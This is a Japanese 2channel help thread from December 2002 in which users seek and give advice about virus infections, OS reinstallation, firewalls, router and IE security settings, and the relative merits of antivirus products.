ハードの容量が 6GBしかなく、軽いウイルスソフトを探しています。 VSOとウイルスバスターは、どちらが軽いのでしょうか? OS は 98SE です。
>>188 >>187 のパスは上から、
(値の設定なし)
C:\Program Files\Apoint2k\Apoint.exe
Antiptaxx.exe
"C:\Program Files\Elaborate Bytes\CloneCD\ElbycCheck.exe" /L ElbyCDFL
"C:\Program Files\Commom Files\CMEU\CMESys.exe"
"C:\Program Files\D-Tools\daemon.exe" -lang 1033
C:WINDOWS\ime\imkr6_1\IMEKRMIG.EXE
C:Program Files\Common Files\Microsoft Shared\IME\IMJP\imjpmig.exe /RemAdvDef /AIMEREG /Migration /SetPreload
C:WINDOWS\IME\imjp8_1\IMJPMIG.EXE /Spoil /RemAdvDef /Migration32
LTSMMSG.exe
C:WINDOWS\System32\IME\PINTLGNT\ImScInst.exe /SYNC
C:Program Files\necmfk\necmfk.exe
NMFTASK>EXE /RESET
C:WINDOWS\System32\IME\TINTLGNT\TINTSETP.EXE /IMEName
C:WINDOWS\System32\IME\TINTLGNT\TINTSETP.EXE /SYNC
C:Program Files\Real\RealPlayer\RealPlay.exe SYSTEMBOOTHIDEPLAYER
"C:\Program Files\Winamp3\winamp.exe"
"C:\Program Files\WinHand\AUTOCLN>EXE"
>>173 Becky!でも回線つけたままでHTMLメールを見るとヤバイかもしれません。
マイクロソフトでIE6をIE6sp1にアップデートして、IEの累積的修正プログラム
インストールしてください。そうすればメールを開いただけでの受動(自動)
感染はなくなります。(ただし、それでも添付ファイルを実行すると感染します。)
>>List.exe踏んだお方 パソ屋に逝って、内蔵HDを一つ購入してくだされ。 今のHDを一旦外して、新HDを接続。 そして新HDにOS入れて、アンチウイルスソフト入れて下され。 各種設定を終えたら、電源カット。 そして新HDをマスター、旧HDをスレーブに接続して下され(そこら辺は、パソの説明書見ればええです)。 新HDからOSを起動しまする。 そして新HDからウイルススキャンしるなり、旧HDのデータを救出して下され。 つか、頑張ってね。
>>193 とんでもないことになっているようですが、
まだHDDにはたいしたものは入ってないので、再インストールで直るのならしても問題ないですか?
>>173 後は193のcheshire-catさんに聞いてください。
ウィルスを2000個も持っておられ非常に詳しく親切な方です。
>>196 再インストールが、リカバリをはじめとする
・本気でHDD全部を買ったときの状態に戻す
・HDD全てを一旦まっさらにしてOSのみ入れる
ことを指しているなら、再インストールで治る。
>>197 わずかながらのファイルをバックアップしたあと、再インストールしてみます。
再インストールすれば、パソコンは、購入直後の状態に戻るのですよね?
>>196 OSをクリーンインストールしると、IMEやATOKのユーザー辞書とか、メルファイル、メーラーのメルファイルとかは消えてまいまするが。
大した物が無いなら、ええかと。
でも本当に、今のHDでリカバリーしると、全部消えてまったりしまするよ?
もしどしても救出したいファイルがあるなら、HD付け替え技でファイル救出して乗り切るのが、一番ええと思うけど。
いずれにしても、最後に判断下すのは君自身っす。
>>200 バックアップしたファイルが感染してたら意味がないけどな。
203 :
薮パソユーザー氏ね :02/12/07 20:18
198 名前:薮パソユーザー ◆0fQkHdNop2 :02/12/07 20:13
>>173 後は193のcheshire-catさんに聞いてください。
ウィルスを2000個も持っておられ非常に詳しく親切な方です。
205 :
薮パソユーザー氏ね :02/12/07 20:19
私も訳分かんなくなってきたのでいっそのこと リカバリしようかと。だけどもせとかもったいないしなあ
>>200 > 再インストールすれば、パソコンは、購入直後の状態に戻るのですよね?
知りません。お使いのパソコンの説明書をご参照ください。
こんな私にアドバイスをしてくださった皆さん、ありがとうございました。 今からバックアップをとり再セットアップを試みたいと思います。 成功したら報告しに戻ってきます。
>>208 > OutlookやEudraやポスペで受信したメールとか、アドレス帳の意味で書いたんだけど。
普通わからない。特に混乱している相手には我流の造語は却って逆効果。
>>207 超残念だけど、完全に元通りじゃないんすよ。
アプリの設定とか、カスタマイズしましたよねん?
例えばWordの行数とか。
そゆ毎日の積み重ねみたいなのは、消えてしまいますて、購入時の状態になってまいまする。
つかそれ系って。
挙動が異なるのが各種あって。
その感染HDで再起動した時が、ちょい怖かったんですよん、再起動時にガーッって音立てて、全てが終わるような予感がしたんで。
だから感染の可能性があるHDでOSを起動させない状態で、他のHDからOS起動して、データファイルをサルベージするようにお勧めしたんですよん。
>>208 勝手に推薦してすみません。
>>204 メールフォルダはたしかフォーマットが通常のと違っていてフォルダが
ファイル表示されてるのだと思います。
私の場合、\windows\Applicationdata\Identities\・・・\Microsoft
\Outlookexpressにあります。
>>209 混乱して困ってる人に、漏れ的用語を提示してもわかりづらいってのは、今かなりドキッっとしました。
以後気をつけまする、マジで反省。
>>壊れた がんがれよ! ハイ、次の方どうぞ
214 :
名無しさん@お腹いっぱい。 :02/12/07 20:43
IDSというシステムを初めて知りました。 ブラックアイスディフェンダーとかいうやつがいいとか 聞きました。あとスノーと?という物もあるらしいですね。 そこでどちらの方が堅固なセキュリティをもたらしてくれるでしょうか?
>>215 パーソナルでなくてもいい(専用機械でも可)がまあ同意。まずはそれ。
つーか、侵入検知って個人レベルで必要なのかな。
いや、
>>214 が個人ユーザとは限らんのだが。
昨日ラブレター感染で今朝、OSごとなくなってる始末、んで、OSインストールに半日。さっきスキャンしたら VBS.Internalというのと、 VBS.Network.Eという友達がいました。 ノートンは修復してくれず、削除できません。 本当に削除できないのでしょうか? こいつらはどのくら怖い事するのでしょうか? mxでマイナーな曲ばかり落してるとこうなっちゃうもんでしょうか? 教えて君で申し訳ないです。漏れもウイルスと一日戦ってつかれちゃいました。。
先日ノートンインターネットセキュリティー2003を買ってインストール し終わったんですが、実際にウィルスに対応してるところを見てみたい(対処 してみたい)んですが、どうすればいいでしょうか? 「あんたらのブラクラウィルスリンクを貼ってみれA」スレ等のリンクを踏むのは やっぱ危険なんですか?
>>217 ネタくせぇ
「LoveLetter」で「OSあぼーん」なんて「彼」が食いつきそうだもの(藁
>>220 ネタじゃないんだって!!シンマテックのHPから削除方法
みて「検索」で探してあったら消せ、というから検索したら
ファイルはなく、のちにウイルスチェックでは絶対ひっかかる。。。
どうしたら消せるのぉぉぉぉぉぉ??おしえてください(__)
222 :
名無しさん@お腹いっぱい。 :02/12/07 22:05
>>219 ありがとうございます。ちゃんと反応してくれました。(あっけなく自動で^^;
223 :
名無しさん@お腹いっぱい。 :02/12/07 22:21
>>221 ネタじゃないなら、正確に詳しく状況を話せ。
>>223 たしかにOS再インストールしてウィルスチェックもせずに怪しい
ファイルを入れるつーのも信じがたい罠。
165からこのスレに助けを求めていましたが、再インストールしてウイルス駆除に成功しました。 助言してくれた方々に重ねて御礼申し上げます。
226 :
阪神 甲子園駅 :02/12/08 04:24
アダルトネット通販のHPから大量に個人情報が盗まれたらしいですが、 本当なのかソースを調べたけど見つからないです。 ヤフーニュース、2ちゃんニュー速、ニュース実況、ダウソ板など探しました。 だれかご存知の方いませんか? 大スポに載っていたらしいとのことで大スポのサイトにも行ってみましたが、 載っていませんでした。 某神戸の組事務所宛てにようこというダッチワイフが注文されていたり、 会社社長がとてつもなくオオキイサイズのバイブを買っていたりしたらしいです。 2ちゃんやほかの掲示板に晒されたらしいのですが・・・・・・。
>>224 OSが割れだった、というオチなら全て筋が通る
228 :
☆☆☆☆☆ :02/12/08 05:20
226=228 ヤフーに見せかけた、アノx-beat系です。 以上、自作自演でした(・∀・)
230 :
名無しさん@お腹いっぱい :02/12/08 05:51
先ほどブラクラを踏んでしまいまして、 とくにダメージは受けなかったのですが、 その時に出たウインドウ(・・のアクセスを許可/遮断)のところで たしかExplorerからのアクセス・・というのを遮断し、 常にのところもチェックをいれたら、 エクスプローラーが使えなくなってしまいました。 どうすれば、修正できるでしょうか??? 今はかちゅーしゃで書き込みしています。
>>230 オマエがどんなOSやセキュリティソフトを使ってるのかさえ
文面からさっぱり分からないのに答えられるわけねぇだろ
232 :
名無しさん@お腹いっぱい :02/12/08 06:53
>231 素人でスマソ。 OSはXP ホームエディションです。 セキュリティはNIS2003です。 よろしくお願い致します。。
>>232 「許可/遮断」の問い合わせは恐らく「NIS2003」が出したもので、
「Internet Explorer」の接続が「常に遮断」へ設定されたせいで
ネットに繋げなくなってしまったのだろう。
「NIS2003」の設定パネルを呼び出してIEの項目を再設定すれば直ると思うぞ。
ノートンのマニュアルかヘルプに設定の仕方が書いてあるはず。
それでも解決しなければ、この板のノートンのスレで聞くか、ネットで検索すれ。
234 :
名無しさん@お腹いっぱい :02/12/08 08:47
了解すますた、ありがとうございますた。
237 :
名無しさん@お腹いっぱい。 :02/12/08 14:23
>>238 >>237 が まともに機能したら
ここで糞質問しても誘導されて
まともな相手をしてもらえなくなっちゃうもんね
240 :
名無しさん@お腹いっぱい。 : :02/12/08 14:51
例えば、ウィルスに感染しても、リカバリでパソコン初期化 すれば、駆除されるのでしょうか?それともされないものも あるのでしょうか?
242 :
名無しさん@お腹いっぱい。 : :02/12/08 14:57
>>240 そうなんですか?やはり、さっぱりになれるんですよね。
>>242 ウイルスといえども単なる一つのプログラム
ウィルス感染したってんでシステム再インストールしたはいいが その後サーバーに残しておいたメールを再度受信した際に 前と全く同じ経路で再感染したとゆー阿呆もいるんで扱いには気をつけるように。
245 :
名無しさん@お腹いっぱい。 : :02/12/08 15:09
>>243 244 はい、勉強になりました。ありがとう。
>>240 BIOSを破壊するウイルスもあるよ。
破壊されたらBIOSを直せなきゃなおらん。
>>246 ときどきあるね、そーゆー古風なウィルス。
どこで拾ってくるのやら…ていうか今時の子って
BIOS復旧なんてできるんだろうか
>>165 あんさん、どこからそのexeファイル落としたの?
丁度その時間あたりにある板のあるスレでそれ
関連の祭りがあったけど、そこでひっかかった口?
もしそうだとしたら、自業自得ということもあるよ。
ちがうのであれば今度は気を付けて下され。
249 :
名無しさん@お腹いっぱい。 :02/12/08 16:37
WIN2K+NIS2001でセキュリティとプライバシーを最高強度にし、IE5.5のセキュリティレベル を中にしています。先日アングラ系サイトを覗くと、私のパソコンのCドライブルートが エクスプローラで表示されていました。 これは私のパソコンのHDDが覗かれていると解釈してよいのでしょうか。 だとしたら対策はありますか。フォルダの存在を見えなくするソフトも あるらしいですが使ったら効果がありますか。
>>249 Cドライブをブラウザに表示させることは出来る。しかし、その内容を送信することはできない。
厨房が好むただの脅し。そういう知識もなしにアングラ行くな。以上
ルータはRTA50iでノートンアンチウィルスも入れてます。
>>252 ただし、IEのセキュリティパッチは洩れなくあてておく事。
あててあれば、ActiveXコンポーネントを(自動)インストールしない限りにおいては
最低のセキュリティレベルでもファイルを盗むことは出来ない。
256 :
名無しさん@お腹いっぱい。 :02/12/08 18:02
SnortとBlack ICEはどっちの方が多くのシグネチャに 対応してますか?
258 :
名無しさん@お腹いっぱい。 :02/12/08 18:24
だから こいつの目的は このスレ埋めることだから 間接的に この板全体を荒らすことにもなるしね
259 :
名無しさん@お腹いっぱい。 :02/12/08 18:27
260 :
名無しさん@お腹いっぱい。 :02/12/08 18:40
>>257 すいません。答えて貰えなかったもんで。
自分では結構調べたんですが・・・
>>259 お前依頼者だな。
なんでスレ内で相談せずいきなり外部に依頼したんだ?
262 :
名無しさん@お腹いっぱい。 :02/12/08 20:56
ウィンドウズのアップデートできてる? 漏れんとこのPCだけどなんどやってもできない。
>>262 かなりFAQ。IEのセキュリティ設定がうまくないとかそんな理由。検索してみ。
>>262 たしかWindows板にWindows Updateに失敗したら上げるスレとかいうスレがあったような
266 :
名無しさん@お腹いっぱい。 :02/12/08 22:32
はじめまして。 どうしても、解決したい問題があります。 お手数ですが、ご回答ならびに、ご指導いただければ幸いです。 過去レスに同様の質問がありましたら、申し訳ありません。 問題: エクスプローラー(v6sp1で、最新のWindows UpDate実行済み)が勝手に 特定のサイトにアクセスする。 その度、自分の意志でブラウジングしている Web画面が変わるので、 非常にウザイです。 自己流の対策: スパイウェアのチェックに「spybot」(ネトランの付録CD) フリーソフトを入れています。 次に、パーソナルF/Wは「Out Post」を入れて、アプリケーション毎 と、ICMP拒否(IPのステルス)、NetBIOSの拒否を実行しています。 が、アプリケーションの接続拒否リストを件の、 URL、およびドメイン名 (P/fwのログで確認しました)を設定したにも関わらず 、勝手にアクセスしてしまいやがります。 ということは、すでに、OSおよびエクスプローラが書き換わってるという ことでしょうか? ウィルスはOS・マカフィーを起動時事にONにしています。また、マザーボード (AOPEN:AK77−333)には、BIOSレベルでウィルスチェックの機能が搭載 されており、何度か実験してみたところ、検出したらピー音がなっています。 知り合いに相談したところ: 結論としてOSの再インストールしかないそうです・・・。 使用環境: 自作PC、OS98、エクスプローラver6(最新のUpDate済み)、 ブロードバンドルータ使っていないので、NAT/IPマスカレードしてません。 Winnyよく使いますので、HDDを今度100GB買います。 ついでに、海外のエロサイトにもよく行きます。(それが原因だと指摘され ています) 使用回線: Yahoo!BB ※「winipcfg」で、開放と書き換えをしょっちゅう行いますが、グロIPが 書き換わった試しがありません。でも、金の割には早いので満足。 2chしか早いレス期待できるとこないわけで・・・。 長文失礼しました。なにとぞ、よろしくご回答お願いいたします。
267 :
名無しさん@お腹いっぱい。 :02/12/08 23:03
>>263-264 Q324929 : 2002 年 12 月 Internet Explorer 用の累積的な修正プログラム
これをなんどDLしても、DLできてない。
『成功』なんて出てきても、IEのバージョンをみるとDLできてないのがわかる。
何が悪いんだ?
270 :
erenor :02/12/08 23:23
TROJ_JAPSX.A というウイルスが私のパソコンにいます。 ウイルスバスターで検出されますが、隔離 できないようです。 毎回、検出されるのですがどうすればよろしいでしょうか? 初心なのでわかりません。
271 :
名無しさん@お腹いっぱい。 :02/12/08 23:25
IPぬいたといわれたんですが ほんとう?
276 :
名無しさん@お腹いっぱい。 :02/12/09 08:49
age
277 :
bloom :02/12/09 09:10
278 :
( ・_・)y─~~~ :02/12/09 14:23
279 :
名無しさん@お腹いっぱい。 :02/12/09 14:32
>>270 そいつは感染活動しないようだから、ハードディスクをフォーマットする
必要はないと思う。273さんより275さんのアドバイスのHPを見た
方が良いと思います。
>>266 マカフィーはウィルス検出力が弱いのでvectorで無料版アンチドートという
強力なウィルス検出ソフトをいダウンロードしてチェックしてみてください。
一番上のボタンを押して「コード解析」だけでなく、「圧縮ファイル」と
「メール検索」にも必ずチェック入れてスキャンしてください。
それから、3番目のボタンでレジストリチェックをしてください。
http://www.vector.co.jp/soft/win95/util/se108623.html それから、悪質なエロサイトに行かれる場合にはActive X、java、
java scriptをオフにされる事を薦めます。
件名なしで本文がtestのみのホットメールが届きました。 添付はありませんでした。 これはウィルスメールですか?
>>283 知 ら ん が な
ウィルスチェックしろ。
>>284 添付ファイルがなければセキュリティーパッチをIEにあててればだいじょうぶ
だと思います。
しかし、知らない相手からtestなどという失礼なタイトルで送られて来た
メールは読まない方が良いでしょう。
>>284 webmailの本文はユーザーがウィルスチェックはできないと思いますけど。
ただし、hotmailは(ウィルス検出力が弱くてあてにできない)マカフィーが
一応はチェックしてたと記憶してます。
>>282 初心者に駆除能力のないAntidoteを勧めるのはいい加減止めろ。
マカフィーの検出力が低い?デマも程々にな。
>>282 レスありがとうございます。「アンチトード」取り敢えず試してみます。
それとこの板の”掟”を知らずに、長々と質問を書き込んだことを、
お詫びします。ちょいと出直してきます。
ありがとうございました。
290 :
名無しさん@お腹いっぱい。 :02/12/09 22:29
>287 必死だな。(プ
291 :
名無しさん@お腹いっぱい。 :02/12/10 08:24
age
>>287 林檎の木というサイトの検出率調査結果でもアンチドート無料版(98.77%)より
マカフィー(89.16%)は劣ってます。これ、100%から引き算すれば未検出率は
9倍ほど違います。
さらに、マカフィーはマイナーなウィルス単体の検出ができないという問題
だけでなく、有名なBadtrans Bウィルス添付メールの検出ができなくて驚いた
私の経験から実際使用における難点があると思ってます。
(マカフィーもBadtrans B単体なら検出できるはずですが形を変えて存在すると
検知できないのだと思います。)
尚、林檎の木というサイトの検出率調査結果ではノートンが1位でアンチドート
無料版が2位ですが、無料版アンチドートはOEのメールフォルダの上から
ウィルスメールを検知できるほど強力ですが、ノートンはできないそうです。
だから、私の知る限り無料版アンチドートがウィルス検出力最強です。
293 :
名無しさん@お腹いっぱい。 :02/12/10 08:55
NAV2002ですが、更新期限が切れました。それはいいのですが、警告ダイアログが でます。 起動時の確認チェックはオプションでしないにできても、一日に一回、不特定の 時間に勝手に出る警告ダイアログを出さない方法はないのでしょうか。 更新する気はありません。 リスクは承知で使用しているのだから、ウザイだけなんです。
あぼーん
>>293 LiveUpdateを止めると可能かもしれないが、更新しないのなら
アンインストールをお勧めします。
他の無料アンチウィルスを使うとか、ノートン体験版をとりあえず入れるとか
なんらかのウィルス対策をした方がいいと思う。
あとは例の方法で更新期限を延ばすとか(w
ノートンインターネットセキュリティスレの過去ログ参照。
297 :
名無しさん@お腹いっぱい。 :02/12/10 09:28
もしかしてヤブパーに粘着してコピペ貼ってるヤシは厨房のフリしたクソソフト会社社員?
チョトワラタ
299 :
名無しさん@お腹いっぱい。 :02/12/10 10:44
ワーオ
>>299 マジレスは情報としてありがたいが、「彼」はここで間違いを指摘されて
知識が付くうちは出て行かないし、間違ったレスを続けると思うので、
基本的に放置でおながいします。
302 :
名無しさん@お腹いっぱい。 :02/12/10 13:27
ヴァカピー必死だな。ワラ
>口調は丁寧かつ親切、それで >いて妙な自信が感じられるので質問した初心者が騙されてしまいます。 前に、そっくりなヤシ居たな。。ココできる前。 あをりに、「白痴」がキーワードだた。。
304 :
名無しさん@お腹いっぱい。 :02/12/10 14:13
NortonInternetSecurity2002を削除して、NAVだけにしたいんですが いったんアンインストールしたらNPFはレジストリからも消えるんでしょうか?
自作自演すな、ヴォケ。
306 :
名無しさん@お腹いっぱい。 :02/12/10 14:26
マカフィーを試してみたいのですが無料御試し版はどこにありまつか?
>>299 オイ、マカの試用版はあるのか?(Wara
マカフィはどうか知らんが他のアンチウィルスソフトは みんな無料版とか試用版とかあった罠。
>>299 検出力といっても、パターンファイルに負うところが大きい訳で。
エンジンで検出力上げると未知?のウイルスに対して検出する可能性は出るけど
敏感になりすぎて誤検出も多くなる訳で。綿密なヒュリスティク掛ければ動作も
重くなる訳で。
パターンファイルは、見つけた新しいウイルスのバイナリを解析して結局人間?
がシコシコパターン登録してる訳で。
んだから、どれだけWEBから新しいウイルス見つけて来れるかというのも重要で
有る訳で。
ドートはAVP絡みで、この辺は海外ユーザーも多い訳で。ウイルス作者も愛用し
てたりする訳で、新作送りつけて登録して貰って喜んでたりする訳で。
シマンテクはBugtraqも手に入れてる訳で。独自のウイルスサーチボット走らせ
て、主要な配布サイト巡廻してるってどっかで読んだ事も有るな。。。
>>305 んぢゃ、何処が自演だか当ててみ?
309=310=dialup-user?
>>311 日本語版もあるんだが近づかん方が良い。代理店が悪名高いあのソースネクスト。
申し訳ないがリンク貼りたくない。
もし見つけても「セキュリティセンター」だけは入れないように。
システム重くするだけで自社製品の宣伝以外何の役にもたたず削除困難のやっかいもの。
>>312 (´-`).。oO(そんなこと分かるわけないだろ)
>>312 >309=310=dialup-user?
ブゥウウウ=====
>>314 >そんなこと分かるわけないだろ
正解でつ!ピンポンピンポン!!
FWにZoneを入れているんですが、XPのFWも設定しておいた方がいいですか?
318 :
名無しさん@お腹いっぱい。 :02/12/10 22:08
ヤフーのADSL(ブリッジタイプのルーター)を入れました ファイヤーウオールとしてノートンISを入れてあれば ブロードバンドルーターを購入する必要はありませんか?
JavaとActiveXの解除の方法教えていただけませんか?
>>319 IEで、ツール→インターネットオプション→セキュリティー→レベルの
カスタマイズで設定してください。
322 :
名無しさん@お腹いっぱい。 :02/12/10 22:52
JavaとActiveXの単語が入ってるのは全部無効にしたほうが良いですか?
326 :
名無しさん@お腹いっぱい。 :02/12/10 23:06
327 :
名無しさん@お腹いっぱい。 :02/12/10 23:07
ブラクラを踏んでしまって、オンラインでチェックかけたら、 どうやらVBS_MERASHAというウイルスに感染してしまってるようなんですが、 どうやったら駆除できるんでしょうか?
〜.ap.plala.or.jp<8080><3128><8000><1080> さっき削除依頼をしたらこのように出たのですが、どうすればよいのでしょうか。 ADSL+ルータ+ノートン先生なんですが
>>328 固定IPアドレスでないなら、ルータの電源を落としてしばらくしてから再起動する。
>>327 ブラクラのアドレス貼ってみ。
直リンは絶対するなよ
>>329 これで何がわかるのでしょうか?
さっきからググッてるんですが、どうも…。
>>331 リモートホストの次の括弧の数字は、ポートスキャンしたポート。
串を使ってないか2ch側がチェックしただけだから、安心しろ。
>>332 安心しました。このポートが開いててガクガクブルブルって訳じゃないんですね…。
あるスレッドで私が発言してことで、相手をものすごく怒らせてしまったようで、 ハッキングされているのではないかと脅えています。 IP晒されてはいないのですが、次のような妙なプログラム言語のようなものがそのスレに書き込まれているのです。 AaA@R(s「 ←英数字の部分は変えてあります のようなものが書かれてあるだけなのですが、これの正体が分からず、 不気味なのです。 これは「お前のパソコンの中身を覗いているぞ」という脅しなのでしょうか? 誰か教えてください。
>>335 もう少し教えていただけませんか?
せめてあの妙な記号の意味だけでも知りたいのです。
不気味でたまりません。
それとも、全く問題ないものだから、無視していいということですか?
>>336 未来のキミからのMessageさ!!
だから、そのうちわかるよ。
>>337 余計に不安になってきました。
粘着ですいませんが、もう少しヒントだけでもお願いします。
放っておいて実害がないのなら、安心するんですが…
私は訳のわからないものが怖いのです。
自分で調べようと思ったのですが、何から調べていいか分かりません。
あの記号を入れてぐぐってみても変な画像とかが見つかるだけだし…
>>339 髪の毛は多い方ですから、まだ多少は大丈夫です。
親が禿げてるから本当は危ないんですが。
341 :
名無しさん@お腹いっぱい。 :02/12/11 09:47
>>341 そうですか…。そちらで聞いてみます。
どうも。
コピペにマジレスカコワルイ
>>320 Yahoo!BB 12Mでトリオモデムを使っているのですが、どうすればルータとして使えますか?
説明書にはルータとしての使用法が書かれていません。
HTML.Redlof.Aというウイルスに感染してしまいました。 シマンテックのサイトで駆除方法を調べて、レジストリもいじって、ちゃんと削除 出来たと思ったのですが、なぜかマイコンピュータの中のファイルやフォルダが 表示されなくなりました。 フォルダの下の「オブジェクト数」が表示されるところには、ちゃんと「○個のオブジェクト」 と表示されます。また検索でファイルやフォルダを検索した時も、ちゃんと表示されます。 ですが、フォルダを開くと中身が表示されず、空っぽの状態です。 フォルダの設定が弄られてしまったのかと思い、「フォルダオプション」の「標準に戻す」や 「全標準をリセット」をクリックしても状態は変わりません。もちろん再起動もしました。 OS再インストールはなるべく回避したいですが、今のままだとそれしか思いつきません。 直す方法をご存知の方、いらっしゃったら教えて下さい。
345です。 すみません。sageそこねました。 何でメル欄じゃなくて名前がsageなんだ。アホすぎだ、自分。 PCじゃなくて自分の頭が感染しているみたいです。 追加ですが、HTML.Redlof.Aについて調べても上記のような症状が出たという 情報が見当たらないので、もしかしたらウイルスが直接の原因ではないのかも しれないです。
「ヤフーはネット直結でヤバイからルーターを買い足せ」と言われました・・・ パソコンに火壁ソフトは入れてあるのですが それでもやはり買い足さないとヤバイのですか?
ゾネのログに FWOUT,2002/12/11,1*:37:54 +9:00 GMT,***.**.**.*:1029,**.**.***.**:80,TCP (flags:S) っつーのが2回ほど残ってたんですけど、これってトロイですかね?
349 :
名無しさん@お腹いっぱい。 :02/12/11 15:13
>>347 本当にネットに直結だったらどんなによかったことか。
ただルータは安心代として有効。アホーに限ったことじゃない。
>>348 あなたのパソコンからwebサイトにアクセスした記録(外部へ送信)。
それだけでは正常の通信。
てすと。
>>350 ありがとうございます。ホッとしますた。
358 :
名無しさん@お腹いっぱい。 :02/12/11 20:29
このスレは死にました。 いや殺されました、藪に。
>>327 もう誰かが答えたかそれとも過去ログにあるかもしれませんが、IEで
ツール→インターネットオプションでインターネット一時ファイルの
削除をして再度ウィルススキャンしてみてください。
>>324 >JavaとActiveXの単語が入ってるのは全部無効にしたほうが良いですか?
いつも全部無効にするとマイクロソフトのサイトでアップデートすらできなく
なります。私は通常はセキュリティー設定の「中」で「有効」となってる事項を
ダイアログ表示に変更してます。
わからなければ、安全なサイトはセキュリティー設定を「中」、危険なサイトは
セキュリティー設定を「高」にしてください。
それから、国際電話・ダイヤルQ2防止ソフトを常駐させてください。
http://www.emurasoft.com/jp/chintcal/index.php 詳しい事はnetn@viという雑誌に時々載ってます。
ほっとぞぬとかつかってんなら、NGワードへの登録をおすすめするよ。 いや、マジで。
とりあえずテンプレ保存して新スレ立てないって事でどうよ? くだ質も
364 :
名無しさん@お腹いっぱい。 :02/12/11 21:17
質問します。 OEに怪しいメールが届くと、すぐにゴミ箱入れるんですが そのメールのプロバティを開いて見ることは危険ですか? 一応、プレビューウィンドウを表示しない設定にしています。
質問です。 Webメールで相手に返信すると、こちらの身元は どこまで相手に判りますか? 私のwebメール宛に届いたメールに返信しようと思ったのですが 相手に私のIP?とか、どの地域に私が住んでいるのか(おおまかでも) 知られたくないのです・・・
>>367 自分で自分宛てにウェブメールを送る
そのヘッダを見る
さ、自分でやってみようか?
>> 362 ありがとうございました。リンク先のページ通りに、フォルダオプション>全般>Web表示 のところを「従来のWindowsフォルダを使う」にしたら、無事ファイルが見えるようになりました。 OS再インストールしなくて済みました。 一回「従来のWindowsフォルダを使う」を選択して適用してからだと、もう一度「フォルダでWeb コンテンツを使う」を選択しても、さっきのようにファイルが見えなくなるような症状は起こらなく なりました。一度見えるようになると元に戻るみたいです。 しかし何もこんな珍しい症状を起こしてくれなくても良いのに。こんな希少性、嫌だ(ノдT) 本気で助かりました。 ◆PhCATJR.v6さんに幸せ訪れろ〜! 山ほど訪れろ〜!! ありがとうございました。
>>367 Air'Hとか、全国規模のプロバのADSLなら(例外はあるらしけど)、割り当てられるIPアドレスは全国単位なんで、地域特定は無理だと思う。
>>369 えがったですね。
んでも、漏れが想定していた状態と違っていたようなんですが。。。。。
とりあえず、おめ。
>>368 そこまでは自力で出来ました。
色々と出てきましたが、私には理解不能です。
ですが、相手はPC関係に詳しいので質問しました。
匿名と言うわけには行かないみたいですね。
>>370 家はケーブルTVなのでバレバレですね。。。
ありがとうございました。
>>372 私のwebメールは私のIPは表示しませんけど。
>>375 フリーでWebメールを提供してる所は、たくさんあって。
中にはヘッダを簡易表示して、詳細を表示しない所もあるし。
最初から受信したメールのヘッダ情報をfromやmessege-idなどしか表示しない所もある。
ちなみに。IPと表記するのは、ヤメレ。
>>375 なんでもいいから、適当なコト言うのはやめてくれ。
それも、さもしてやったりのように。
>>377 一筋縄でいかないお方なんで放置でおながいします。
(ハックラ板でもこーゆーのはいないかも、というほどのお方です)
>>378 どーしても書きたくなりました。
今回だけのご無礼お許しを。
>>381 レスサンクス!どうやらゲームオーバーのようですね(泣)
>にゃたん まぁ、お気楽に(らぶ
385 :
名無しさん@お腹いっぱい。 :02/12/11 23:19
>>383 FinalDataエンタープライズとかじゃなくても。
jpgとかなら、FINALDATA フォトリカバリーで救出できたって報告が1例だけありますたが。
エンタープライズ板でも全部ダメっていうお方もいたけど。
一応、これお勧めしまする(安価で高性能だし)。
他のHDにOSとアンチウイルスソフトとこれをインストール。
そして新HDをマスター、旧HDをスレーブ接続して起動。
旧HDのデーターをサルベージすると、全てとは言えないけど、昔削除したファイルとかWordのテンポラリファイルとかは拾えるかもしれませぬ。
FINALDATA2.0 DX Premium
http://www.finaldata.ne.jp/
388 :
名無しさん@お腹いっぱい。 :02/12/11 23:25
ポートスキャンというのをされるとどういう害が出るのですか? 友人から「セキュリティソフト入れてないとポートスキャンとかされてヤバイぞ」って言われたので ちょっと気になるので教えてください
377はほっとめーるしか知らないと思われ。
>>388 ポートスキャン自体には害はない。アタックの下準備の様なもの。
ファイアーウォールを入れておけば、スキャンされてもPCの存在を隠すことが可能。
どちらかとゆーとポートスキャン「とか」の「とか」のほうがヤバいというか要対策。
>>388 アンチウィルスソフトは多少無理してでも絶対に導入する。
パーソナルファイアーウォールソフトも、
ファイアウォール機能のあるルーターとか使ってるのでなければ入れとけ。
ともに導入・設定に関しては多少の(金額にまあまあ反比例した)勉強が必要。
393 :
名無しさん@お腹いっぱい。 :02/12/12 00:20
質問です ブロードバンドルータを買いました。 パケットフィルタリングという機能がついているのですが、 マニュアルを読んでも設定の仕方がまるで分かりません。 易しく説明してあるサイトがあれば教えて下さい。 ちなみに、アイオーデータの「WN-B11/BBRH-S2」です。
パケットフィルタってのはどのルータでもついている。 あんまし、やくにたたんので気にしなさんな。 宣伝ほどの効果はどのメーカもなし。 コレガなんかステルスもついてるぞ、意味ねーけどよ
395 :
名無しさん@お腹いっぱい。 :02/12/12 01:34
すいません、ちょっと質問させてください
先程いきなり「〜meesage」と銘打ったウインドウが開きました
普通に2ch見てたら最前面にいきなりです
中身は文字化けしていて解読できず
で、不安になったのでオンラインスキャンしましたところ
Agobot.wormというのがひとつ検出されました
http://www.ahnlab.co.jp/virusinfo/view.asp?seq=245&pageNo=1 だもんで↑を読んで
まずsysmgr.exeを削除、続いてレジストリは見てみましたが
Config Loaderなる項目は追加されてはいませんでした
次にpsexec.exeというのを検索しましたら一つ発見!そっこう削除しましたが・・・
さて、これってヤバい状況なんでしょうか。あのメッセージウインドウが
気になって仕方ないんですが・・・
396 :
名無しさん@お腹いっぱい。 :02/12/12 02:02
最近おれのパソの調子が悪い 電源がなかなか立ちあがりません 最近メッセで知らない奴が話したいつーことで、少し躊躇したがメンバーに入れてしまった なんかそれ以来調子おかしいのですが また今日MSNのホーム開いたら、おれが登録している地域と星座じゃなくて 別の地域(大阪)星座(水瓶座)になってた 実は大阪には最近、彼女がらみの知らない男が確かにいるんです おれのパソに入りこんでいるという可能性はありますか? どうか教えてください
397 :
名無しさん@お腹いっぱい。 :02/12/12 02:02
最近おれのパソの調子が悪い 電源がなかなか立ちあがりません 最近メッセで知らない奴が話したいつーことで、少し躊躇したがメンバーに入れてしまった なんかそれ以来調子おかしいのですが また今日MSNのホーム開いたら、おれが登録している地域と星座じゃなくて 別の地域(大阪)星座(水瓶座)になってた 実は大阪には最近、彼女がらみの知らない男が確かにいるんです おれのパソに入りこんでいるという可能性はありますか? どうか教えてください
398 :
名無しさん@お腹いっぱい。 :02/12/12 02:03
